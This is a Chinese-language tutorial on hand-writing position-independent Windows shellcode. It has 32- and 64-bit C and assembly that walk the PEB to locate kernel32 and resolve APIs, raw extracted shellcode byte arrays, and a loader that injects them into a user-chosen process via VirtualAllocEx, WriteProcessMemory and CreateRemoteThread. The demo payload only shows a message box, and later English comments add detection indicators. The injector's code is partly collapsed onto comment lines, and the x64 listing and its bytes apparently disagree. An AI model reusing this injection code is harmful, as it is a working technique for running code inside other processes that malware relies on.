原理

简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。


具体注意:

  • 使用 API 时应该动态调用(GetProcAddress)
  • 不能使用全局变量,或者用 static 修饰的变量
  • 在 shellcode 工程中要自定义入口函数
  • 确保调用 API 之前都已经加载了与之对应的 DLL
  • 所有的字符串都要用字符数组的方式代替(逐字符初始化的局部数组,避免引用数据段中的字符串常量)

环境搭建

首先新建一个项目,这里我推荐 空项目,之后创建一个 main.cpp 文件:

使用 Release 模式写代码,这是因为 Debug 模式下的代码在转换成汇编后首先都是一个 jmp(通常是增量链接生成的跳转表项),然后再跳到我们的功能代码处,但这个 jmp 指令是 “地址相关” 的,所以在转换成 shellcode 时就会出错!

修改项目属性:

编写 ShellCode

32位:

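#include <windows.h>

FARPROC getProcAddress(HMODULE hModuleBase);
DWORD getKernel32();

/*
 * EntryMain - custom entry point of the 32-bit demo payload.
 *
 * Line breaks lost in the published listing are restored here; without them
 * the leading `//` comment swallows the whole function body.
 *
 * What it does, in order:
 *   1. getProcAddress(getKernel32()) parses an export table to find
 *      GetProcAddress.
 *   2. GetProcAddress is used to obtain LoadLibraryW.
 *   3. LoadLibraryW loads user32.dll and GetProcAddress resolves MessageBoxW.
 *   4. One message box is shown ("Shellcode" / "LYSM").
 *
 * No API is called through the import table, and every string is a local
 * array initialised character by character. In the x86 byte array published
 * later on this page those strings show up as immediate operands of stack
 * stores (C7 45 D0 'Load', C7 45 D4 'Libr', C7 45 D8 'aryW'), not as
 * contiguous strings in a data section - worth knowing when searching a
 * memory dump for API names.
 *
 * Returns 0. None of the resolved pointers is checked: if getProcAddress()
 * returns NULL, or LoadLibraryW / GetProcAddress fail, the next call goes
 * through a null function pointer.
 */
int EntryMain()
{
    // get function address: GetProcAddress
    typedef FARPROC(WINAPI* FN_GetProcAddress)(
        _In_ HMODULE hModule,
        _In_ LPCSTR lpProcName);
    FN_GetProcAddress fn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)getKernel32());

    // get function address: LoadLibraryW
    typedef HMODULE(WINAPI* FN_LoadLibraryW)(
        _In_ LPCWSTR lpLibFileName);
    char xyLoadLibraryW[] = { 'L','o','a','d','L','i','b','r','a','r','y','W',0 };
    FN_LoadLibraryW fn_LoadLibraryW = (FN_LoadLibraryW)fn_GetProcAddress((HMODULE)getKernel32(), xyLoadLibraryW);

    // get function address: MessageBoxW
    typedef int (WINAPI* FN_MessageBoxW)(
        _In_opt_ HWND hWnd,
        _In_opt_ LPCWSTR lpText,
        _In_opt_ LPCWSTR lpCaption,
        _In_ UINT uType);
    wchar_t xy_user32[] = { 'u','s','e','r','3','2','.','d','l','l',0 };
    char xy_MessageBoxW[] = { 'M','e','s','s','a','g','e','B','o','x','W',0 };
    FN_MessageBoxW fn_MessageBoxW = (FN_MessageBoxW)fn_GetProcAddress(fn_LoadLibraryW(xy_user32), xy_MessageBoxW);

    // shellcode test
    wchar_t xy_Hello[] = { 'S','h','e','l','l','c','o','d','e',0 };
    wchar_t xy_tip[] = { 'L','Y','S','M',0 };
    // The last argument is uType; NULL evaluates to 0 here, i.e. MB_OK.
    fn_MessageBoxW(NULL, xy_Hello, xy_tip, NULL);
    return 0;
}
// get module base: kernel32.dll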
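/*
 * getKernel32 - returns in EAX the DllBase of the third module in the
 * loader's in-memory-order module list (32-bit process).
 *
 * The instructions are restored one per line; collapsed onto a single line
 * the inline assembly block does not assemble.
 *
 * The function is `naked`, so the compiler emits no prologue or epilogue and
 * the body must end with its own `ret`.
 *
 * Offsets follow the commonly published 32-bit PEB / PEB_LDR_DATA /
 * LDR_DATA_TABLE_ENTRY layout; these structures are only partly documented.
 * NOTE(review): the code assumes the third list entry is kernel32.dll and
 * never checks the module name - confirm for the Windows build in question.
 *
 * For analysts: this routine assembles to the byte run
 * 64 A1 30 00 00 00 8B 40 0C 8B 40 14 8B 00 8B 00 8B 40 10 C3, which is
 * visible at the tail of the x86 array published on this page. A read of
 * fs:[30h] followed by a walk of the loader lists, located outside any
 * mapped image, is a widely used indicator for injected code.
 */
__declspec(naked) DWORD getKernel32()
{
    __asm
    {
        mov eax, fs: [30h]      // PEB address, read from the TEB
        mov eax, [eax + 0ch]    // PEB->Ldr
        mov eax, [eax + 14h]    // Ldr->InMemoryOrderModuleList.Flink (1st entry)
        mov eax, [eax]          // 2nd entry
        mov eax, [eax]          // 3rd entry
        mov eax, [eax + 10h]    // DllBase, 10h past the entry's InMemoryOrderLinks
        ret
    }
}
// get function address: GetProcAddress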
/*
 * getProcAddress - find the export named "GetProcAddress" in a mapped
 * 32-bit PE image by walking its export directory by hand.
 *
 * hModuleBase: base address of the mapped module.
 * Returns the export's address, or NULL when the image has no export
 * directory (Size or VirtualAddress is zero) or no name matches.
 *
 * Caveats visible in the code:
 *   - The MZ / PE signatures are not validated and no RVA is bounds-checked,
 *     so the walk is only safe on a well-formed, fully mapped image.
 *   - Exactly the 14 letters of "GetProcAddress" are compared; the
 *     terminating NUL is not, so this is a prefix match.
 *   - NOTE(review): the loop bound is NumberOfNames - 1; if NumberOfNames
 *     is an unsigned field holding 0 the bound wraps - confirm.
 */
FARPROC getProcAddress(HMODULE hModuleBase)
{
    const DWORD base = (DWORD)hModuleBase;

    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModuleBase;
    PIMAGE_NT_HEADERS32 ntHeader = (PIMAGE_NT_HEADERS)(base + dosHeader->e_lfanew);

    // An image without an export directory has nothing to search.
    if (!ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size ||
        !ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) {
        return NULL;
    }

    PIMAGE_EXPORT_DIRECTORY exports = (PIMAGE_EXPORT_DIRECTORY)(
        base + (DWORD)ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    // The three parallel export tables; every stored value is an RVA.
    PDWORD nameRvas = (PDWORD)(base + (DWORD)exports->AddressOfNames);
    PWORD nameOrdinals = (PWORD)(base + (DWORD)exports->AddressOfNameOrdinals);
    PDWORD functionRvas = (PDWORD)(base + (DWORD)exports->AddressOfFunctions);

    for (DWORD i = 0; i <= exports->NumberOfNames - 1; i++) {
        char* name = (char*)(nameRvas[i] + base);

        // Character-by-character compare: no string constant, no CRT call.
        if (name[0] == 'G' && name[1] == 'e' && name[2] == 't' &&
            name[3] == 'P' && name[4] == 'r' && name[5] == 'o' && name[6] == 'c' &&
            name[7] == 'A' && name[8] == 'd' && name[9] == 'd' && name[10] == 'r' &&
            name[11] == 'e' && name[12] == 's' && name[13] == 's') {
            // name index -> ordinal -> function RVA -> absolute address
            return (FARPROC)(functionRvas[nameOrdinals[i]] + base);
        }
    }
    return NULL;
}

64位:
x64.asm,具体设置参考:https://blog.csdn.net/Simon798/article/details/107051541

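.code
; getKernel32 - returns in RAX the DllBase of the third module in the
; loader's initialization-order module list (64-bit process).
;
; The instructions are restored one per line; in the published listing they
; were fused onto the `proc` line and would not assemble.
;
; Offsets follow the commonly published x64 PEB / PEB_LDR_DATA /
; LDR_DATA_TABLE_ENTRY layout; these structures are only partly documented.
; NOTE(review): the code assumes the third list entry is kernel32.dll and
; never checks the module name - confirm for the Windows build in question.
;
; For analysts: the first instruction encodes as 65 48 8B 04 25 60 00 00 00,
; which is visible near the tail of the x64 array published on this page.
getKernel32     proc
        mov     rax, gs:[60h]       ; PEB address, read from the TEB
        mov     rax, [rax+18h]      ; PEB->Ldr
        mov     rax, [rax+30h]      ; Ldr->InInitializationOrderModuleList.Flink (1st entry)
        mov     rax, [rax]          ; 2nd entry
        mov     rax, [rax]          ; 3rd entry
        mov     rax, [rax+10h]      ; DllBase, 10h past the entry's InInitializationOrderLinks
        ret
getKernel32     endp
end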

main.cpp

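#include <windows.h>

FARPROC getProcAddress(HMODULE hModuleBase);
extern "C" PVOID64 getKernel32();   // implemented in x64.asm (MSVC has no x64 inline assembly)

/*
 * EntryMain - custom entry point of the 64-bit demo payload.
 *
 * Line breaks lost in the published listing are restored here; without them
 * the leading `//` comment swallows the whole function body.
 *
 * Same sequence as the 32-bit version: resolve GetProcAddress from an export
 * table, use it to get LoadLibraryW, load user32.dll, resolve MessageBoxW and
 * show one message box ("Shellcode" / "LYSM"). All strings are local arrays
 * initialised character by character.
 *
 * Returns 0. None of the resolved pointers is checked before it is called.
 *
 * NOTE(review): Sleep(10000) below is an ordinary imported call, unlike every
 * other API in this function, which contradicts the article's own rule that
 * APIs be resolved at run time. The x64 byte array published later on this
 * page appears to contain no corresponding call after the MessageBoxW call,
 * so the listing and the published bytes seem to come from different builds.
 */
int EntryMain()
{
    // get function address: GetProcAddress
    typedef FARPROC(WINAPI* FN_GetProcAddress)(
        _In_ HMODULE hModule,
        _In_ LPCSTR lpProcName);
    FN_GetProcAddress fn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)getKernel32());

    // get function address: LoadLibraryW
    typedef HMODULE(WINAPI* FN_LoadLibraryW)(
        _In_ LPCWSTR lpLibFileName);
    char xyLoadLibraryW[] = { 'L','o','a','d','L','i','b','r','a','r','y','W',0 };
    FN_LoadLibraryW fn_LoadLibraryW = (FN_LoadLibraryW)fn_GetProcAddress((HMODULE)getKernel32(), xyLoadLibraryW);

    // get function address: MessageBoxW
    typedef int (WINAPI* FN_MessageBoxW)(
        _In_opt_ HWND hWnd,
        _In_opt_ LPCWSTR lpText,
        _In_opt_ LPCWSTR lpCaption,
        _In_ UINT uType);
    wchar_t xy_user32[] = { 'u','s','e','r','3','2','.','d','l','l',0 };
    char xy_MessageBoxW[] = { 'M','e','s','s','a','g','e','B','o','x','W',0 };
    FN_MessageBoxW fn_MessageBoxW = (FN_MessageBoxW)fn_GetProcAddress(fn_LoadLibraryW(xy_user32), xy_MessageBoxW);

    // shellcode test
    wchar_t xy_Hello[] = { 'S','h','e','l','l','c','o','d','e',0 };
    wchar_t xy_tip[] = { 'L','Y','S','M',0 };
    // The last argument is uType; NULL evaluates to 0 here, i.e. MB_OK.
    fn_MessageBoxW(NULL, xy_Hello, xy_tip, NULL);
    Sleep(10000);
    return 0;
}
// get function address: GetProcAddress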
/*
 * getProcAddress - find the export named "GetProcAddress" in a mapped
 * 64-bit PE image by walking its export directory by hand.
 *
 * hModuleBase: base address of the mapped module.
 * Returns the export's address, or NULL when the image has no export
 * directory (Size or VirtualAddress is zero) or no name matches.
 *
 * Caveats visible in the code:
 *   - The MZ / PE signatures are not validated and no RVA is bounds-checked,
 *     so the walk is only safe on a well-formed, fully mapped image.
 *   - Exactly the 14 letters of "GetProcAddress" are compared; the
 *     terminating NUL is not, so this is a prefix match.
 *   - NOTE(review): the loop bound is NumberOfNames - 1; if NumberOfNames
 *     is an unsigned field holding 0 the bound wraps - confirm.
 */
FARPROC getProcAddress(HMODULE hModuleBase)
{
    const ULONG64 base = (ULONG64)hModuleBase;

    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModuleBase;
    PIMAGE_NT_HEADERS64 ntHeader = (PIMAGE_NT_HEADERS64)(base + dosHeader->e_lfanew);

    // An image without an export directory has nothing to search.
    if (!ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size ||
        !ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) {
        return NULL;
    }

    PIMAGE_EXPORT_DIRECTORY exports = (PIMAGE_EXPORT_DIRECTORY)(
        base + (ULONG64)ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    // The three parallel export tables; every stored value is a 32-bit RVA.
    PDWORD nameRvas = (PDWORD)(base + (ULONG64)exports->AddressOfNames);
    PWORD nameOrdinals = (PWORD)(base + (ULONG64)exports->AddressOfNameOrdinals);
    PDWORD functionRvas = (PDWORD)(base + (ULONG64)exports->AddressOfFunctions);

    for (DWORD i = 0; i <= exports->NumberOfNames - 1; i++) {
        char* name = (char*)(nameRvas[i] + base);

        // Character-by-character compare: no string constant, no CRT call.
        if (name[0] == 'G' && name[1] == 'e' && name[2] == 't' &&
            name[3] == 'P' && name[4] == 'r' && name[5] == 'o' && name[6] == 'c' &&
            name[7] == 'A' && name[8] == 'd' && name[9] == 'd' && name[10] == 'r' &&
            name[11] == 'e' && name[12] == 's' && name[13] == 's') {
            // name index -> ordinal -> function RVA -> absolute address
            return (FARPROC)(functionRvas[nameOrdinals[i]] + base);
        }
    }
    return NULL;
}

提取 ShellCode

打开 studyPE ,拖入编译后的 exe,记录代码段文件偏移:

打开 C32Asm,拖入 exe,转到文件偏移处,拷贝一段连续的 hex 码:

这就是我们需要的 ShellCode 了 (o゚v゚)ノ

使用 ShellCode

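写一个 Shell Code 加载器,它依次调用 OpenProcess、VirtualAllocEx、WriteProcessMemory 和 CreateRemoteThread,把 shellcode 写入指定 PID 的进程并在其中创建线程执行(这一调用序列也是终端防护软件识别远程线程注入时最常监控的行为):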


#include <windows.h>
#include <iostream>
using namespace std;// x86 shellcode
// Raw machine code, per the article copied out of the code section of the
// compiled 32-bit listing. main() writes this array byte-for-byte into the
// target process, so its size is what sizeof(shellcode) reports there.
// Recognisable fragments for anyone matching this against a memory dump:
//   - the repeated 0x80,0x78,NN,CC,0x75,.. groups are `cmp byte ptr [eax+NN], CC / jne`,
//     the inlined character-by-character compare against "GetProcAddress";
//   - the trailing 0x64,0xA1,0x30,0x00,0x00,0x00 ... 0xC3 is getKernel32
//     (`mov eax, fs:[30h]` and the loader-list walk).
UCHAR shellcode[] = { 0x55,  0x8B,  0xEC,  0x83,  0xEC,  0x5C,  0x53,  0x56,  0x57,  0xE8,  0x72,  0x01,  0x00,  0x00,  0x8B,  0xD0,  0x33,  0xDB,  0x8B,  0x42,  0x3C,  0x39,  0x5C,  0x10,  0x7C,  0x0F,  0x84,  0x9F,  0x00,  0x00,  0x00,  0x8B,  0x74,  0x10,  0x78,  0x85,  0xF6,  0x0F,  0x84,  0x93,  0x00,  0x00,  0x00,  0x8B,  0x44,  0x16,  0x24,  0x33,  0xC9,  0x8B,  0x7C,  0x16,  0x20,  0x03,  0xC2,  0x89,  0x45,  0xFC,  0x03,  0xFA,  0x8B,  0x44,  0x16,  0x1C,  0x8B,  0x74,  0x16,  0x18,  0x03,  0xC2,  0x89,  0x45,  0xF8,  0x4E,  0x66,  0x0F,  0x1F,  0x44,  0x00,  0x00,  0x8B,  0x04,  0x8F,  0x03,  0xC2,  0x80,  0x38,  0x47,  0x75,  0x4E,  0x80,  0x78,  0x01,  0x65,  0x75,  0x48,  0x80,  0x78,  0x02,  0x74,  0x75,  0x42,  0x80,  0x78,  0x03,  0x50,  0x75,  0x3C,  0x80,  0x78,  0x04,  0x72,  0x75,  0x36,  0x80,  0x78,  0x05,  0x6F,  0x75,  0x30,  0x80,  0x78,  0x06,  0x63,  0x75,  0x2A,  0x80,  0x78,  0x07,  0x41,  0x75,  0x24,  0x80,  0x78,  0x08,  0x64,  0x75,  0x1E,  0x80,  0x78,  0x09,  0x64,  0x75,  0x18,  0x80,  0x78,  0x0A,  0x72,  0x75,  0x12,  0x80,  0x78,  0x0B,  0x65,  0x75,  0x0C,  0x80,  0x78,  0x0C,  0x73,  0x75,  0x06,  0x80,  0x78,  0x0D,  0x73,  0x74,  0x07,  0x41,  0x3B,  0xCE,  0x76,  0xA3,  0xEB,  0x0F,  0x8B,  0x45,  0xFC,  0x8B,  0x5D,  0xF8,  0x0F,  0xB7,  0x04,  0x48,  0x8B,  0x1C,  0x83,  0x03,  0xDA,  0x8D,  0x45,  0xD0,  0xC7,  0x45,  0xD0,  0x4C,  0x6F,  0x61,  0x64,  0x50,  0xC7,  0x45,  0xD4,  0x4C,  0x69,  0x62,  0x72,  0xC7,  0x45,  0xD8,  0x61,  0x72,  0x79,  0x57,  0xC6,  0x45,  0xDC,  0x00,  0xE8,  0xA0,  0x00,  0x00,  0x00,  0x50,  0xFF,  0xD3,  0x33,  0xC9,  0xC7,  0x45,  0xA4,  0x75,  0x00,  0x73,  0x00,  0x66,  0x89,  0x4D,  0xB8,  0x8D,  0x4D,  0xE0,  0x51,  0x8D,  0x4D,  0xA4,  0xC7,  0x45,  0xA8,  0x65,  0x00,  0x72,  0x00,  0x51,  0xC7,  0x45,  0xAC,  0x33,  0x00,  0x32,  0x00,  0xC7,  0x45,  0xB0,  0x2E,  0x00,  0x64,  0x00,  0xC7,  0x45,  0xB4,  0x6C,  0x00,  0x6C,  0x00,  0xC7,  0x45,  0xE0,  0x4D,  0x65,  0x73,  
0x73,  0xC7,  0x45,  0xE4,  0x61,  0x67,  0x65,  0x42,  0xC7,  0x45,  0xE8,  0x6F,  0x78,  0x57,  0x00,  0xFF,  0xD0,  0x50,  0xFF,  0xD3,  0x33,  0xC9,  0xC7,  0x45,  0xBC,  0x53,  0x00,  0x68,  0x00,  0x51,  0x66,  0x89,  0x4D,  0xF4,  0x8D,  0x4D,  0xEC,  0x51,  0x8D,  0x4D,  0xBC,  0xC7,  0x45,  0xC0,  0x65,  0x00,  0x6C,  0x00,  0x51,  0x6A,  0x00,  0xC7,  0x45,  0xC4,  0x6C,  0x00,  0x63,  0x00,  0xC7,  0x45,  0xC8,  0x6F,  0x00,  0x64,  0x00,  0xC7,  0x45,  0xCC,  0x65,  0x00,  0x00,  0x00,  0xC7,  0x45,  0xEC,  0x4C,  0x00,  0x59,  0x00,  0xC7,  0x45,  0xF0,  0x53,  0x00,  0x4D,  0x00,  0xFF,  0xD0,  0x5F,  0x5E,  0x33,  0xC0,  0x5B,  0x8B,  0xE5,  0x5D,  0xC3,  0xCC,  0xCC,  0xCC,  0xCC,  0xCC,  0x64,  0xA1,  0x30,  0x00,  0x00,  0x00,  0x8B,  0x40,  0x0C,  0x8B,  0x40,  0x14,  0x8B,  0x00,  0x8B,  0x00,  0x8B,  0x40,  0x10,  0xC3,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00,  0x00};// x64 shellcode
// The 64-bit variant is commented out; only one definition of `shellcode`
// can be active, and it has to match the bitness of the loader build.
// Its tail 0x65,0x48,0x8B,0x04,0x25,0x60,0x00,0x00,0x00 is `mov rax, gs:[60h]`,
// the start of the x64 getKernel32.
/*UCHAR shellcode[] = { 0x48,  0x89,  0x5C,  0x24,  0x08,  0x48,  0x89,  0x74,  0x24,  0x10,  0x48,  0x89,  0x7C,  0x24,  0x18,  0x55,  0x41,  0x56,  0x41,  0x57,  0x48,  0x8B,  0xEC,  0x48,  0x81,  0xEC,  0x80,  0x00,  0x00,  0x00,  0xE8,  0x9D,  0x01,  0x00,  0x00,  0x4C,  0x8B,  0xC0,  0x33,  0xDB,  0x8B,  0xFB,  0x48,  0x63,  0x40,  0x3C,  0x42,  0x39,  0x9C,  0x00,  0x8C,  0x00,  0x00,  0x00,  0x0F,  0x84,  0xA7,  0x00,  0x00,  0x00,  0x42,  0x8B,  0x8C,  0x00,  0x88,  0x00,  0x00,  0x00,  0x85,  0xC9,  0x0F,  0x84,  0x97,  0x00,  0x00,  0x00,  0x45,  0x8B,  0x54,  0x08,  0x24,  0x49,  0x8D,  0x04,  0x08,  0x41,  0x8B,  0x4C,  0x08,  0x20,  0x4D,  0x03,  0xD0,  0x44,  0x8B,  0x58,  0x1C,  0x49,  0x03,  0xC8,  0x44,  0x8B,  0x48,  0x18,  0x4D,  0x03,  0xD8,  0x41,  0xFF,  0xC9,  0x8B,  0xD3,  0x8B,  0x01,  0x49,  0x03,  0xC0,  0x80,  0x38,  0x47,  0x75,  0x4E,  0x80,  0x78,  0x01,  0x65,  0x75,  0x48,  0x80,  0x78,  0x02,  0x74,  0x75,  0x42,  0x80,  0x78,  0x03,  0x50,  0x75,  0x3C,  0x80,  0x78,  0x04,  0x72,  0x75,  0x36,  0x80,  0x78,  0x05,  0x6F,  0x75,  0x30,  0x80,  0x78,  0x06,  0x63,  0x75,  0x2A,  0x80,  0x78,  0x07,  0x41,  0x75,  0x24,  0x80,  0x78,  0x08,  0x64,  0x75,  0x1E,  0x80,  0x78,  0x09,  0x64,  0x75,  0x18,  0x80,  0x78,  0x0A,  0x72,  0x75,  0x12,  0x80,  0x78,  0x0B,  0x65,  0x75,  0x0C,  0x80,  0x78,  0x0C,  0x73,  0x75,  0x06,  0x80,  0x78,  0x0D,  0x73,  0x74,  0x0D,  0xFF,  0xC2,  0x48,  0x83,  0xC1,  0x04,  0x41,  0x3B,  0xD1,  0x76,  0x9D,  0xEB,  0x0E,  0x8B,  0xC2,  0x41,  0x0F,  0xB7,  0x0C,  0x42,  0x41,  0x8B,  0x3C,  0x8B,  0x49,  0x03,  0xF8,  0xC7,  0x45,  0xC0,  0x4C,  0x6F,  0x61,  0x64,  0xC7,  0x45,  0xC4,  0x4C,  0x69,  0x62,  0x72,  0xC7,  0x45,  0xC8,  0x61,  0x72,  0x79,  0x57,  0xC6,  0x45,  0xCC,  0x00,  0xE8,  0xBF,  0x00,  0x00,  0x00,  0x48,  0x8B,  0xC8,  0x48,  0x8D,  0x55,  0xC0,  0xFF,  0xD7,  0x48,  0x8D,  0x4D,  0xE8,  0xC7,  0x45,  0xE8,  0x75,  0x00,  0x73,  0x00,  0xC7,  0x45,  0xEC,  0x65,  0x00,  
0x72,  0x00,  0xC7,  0x45,  0xF0,  0x33,  0x00,  0x32,  0x00,  0xC7,  0x45,  0xF4,  0x2E,  0x00,  0x64,  0x00,  0xC7,  0x45,  0xF8,  0x6C,  0x00,  0x6C,  0x00,  0x66,  0x89,  0x5D,  0xFC,  0xC7,  0x45,  0xB0,  0x4D,  0x65,  0x73,  0x73,  0xC7,  0x45,  0xB4,  0x61,  0x67,  0x65,  0x42,  0xC7,  0x45,  0xB8,  0x6F,  0x78,  0x57,  0x00,  0xFF,  0xD0,  0x48,  0x8B,  0xC8,  0x48,  0x8D,  0x55,  0xB0,  0xFF,  0xD7,  0x45,  0x33,  0xC9,  0xC7,  0x45,  0xD0,  0x53,  0x00,  0x68,  0x00,  0x4C,  0x8D,  0x45,  0xA0,  0xC7,  0x45,  0xD4,  0x65,  0x00,  0x6C,  0x00,  0x48,  0x8D,  0x55,  0xD0,  0xC7,  0x45,  0xD8,  0x6C,  0x00,  0x63,  0x00,  0x33,  0xC9,  0xC7,  0x45,  0xDC,  0x6F,  0x00,  0x64,  0x00,  0xC7,  0x45,  0xE0,  0x65,  0x00,  0x00,  0x00,  0xC7,  0x45,  0xA0,  0x4C,  0x00,  0x59,  0x00,  0xC7,  0x45,  0xA4,  0x53,  0x00,  0x4D,  0x00,  0x66,  0x89,  0x5D,  0xA8,  0xFF,  0xD0,  0x4C,  0x8D,  0x9C,  0x24,  0x80,  0x00,  0x00,  0x00,  0x33,  0xC0,  0x49,  0x8B,  0x5B,  0x20,  0x49,  0x8B,  0x73,  0x28,  0x49,  0x8B,  0x7B,  0x30,  0x49,  0x8B,  0xE3,  0x41,  0x5F,  0x41,  0x5E,  0x5D,  0xC3,  0xCC,  0xCC,  0xCC,  0xCC,  0xCC,  0xCC,  0xCC,  0xCC,  0x65,  0x48,  0x8B,  0x04,  0x25,  0x60,  0x00,  0x00,  0x00,  0x48,  0x8B,  0x40,  0x18,  0x48,  0x8B,  0x40,  0x30,  0x48,  0x8B,  0x00,  0x48,  0x8B,  0x00,  0x48,  0x8B,  0x40,  0x10,  0xC3,  0x00,  0x00,  0x00,  0x00};*/
int main()
{// some variables statementDWORD targetPid = 0;HANDLE h_target = NULL;LPVOID p_base = NULL;HANDLE h_thread = NULL;// get target process handlecout << "input target process id:";cin >> targetPid;h_target = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPid);if (h_target == NULL) {cout << "OpenProcess failed." << endl;goto main_end;}// request memory in target process p_base  = VirtualAllocEx(h_target, NULL, sizeof(shellcode), MEM_COMMIT ,PAGE_EXECUTE_READWRITE);if (p_base == NULL) {cout << "VirtualAllocEx failed." << endl;goto main_end;}// write shellcode in requested memoryif (!WriteProcessMemory(h_target, p_base, (LPVOID)shellcode, sizeof(shellcode), NULL)) {cout << "WriteProcessMemory failed." << endl;goto main_end;}// create thread and execute shellcodeh_thread = CreateRemoteThread(h_target, 0, 0,(LPTHREAD_START_ROUTINE)p_base, NULL, 0, NULL);if (h_thread == NULL) {cout << "CreateRemoteThread failed." << endl;goto main_end;}main_end:// when MessageBox appears but you don't click the button,// now , call VirtualFreeEx to free memory then click button will lead target procedure to breakdown./*if (p_base) {VirtualFreeEx(h_target, p_base, 0, MEM_RELEASE);}*/if (h_target)CloseHandle(h_target);if (h_thread)CloseHandle(h_thread);getchar();return 0;
}

测试

32位 shellcode 注入 32位程序(注入器也要编译成32位),成功:

64位 shell code 注入 64位程序(注入器也要编译成 64位),成功:
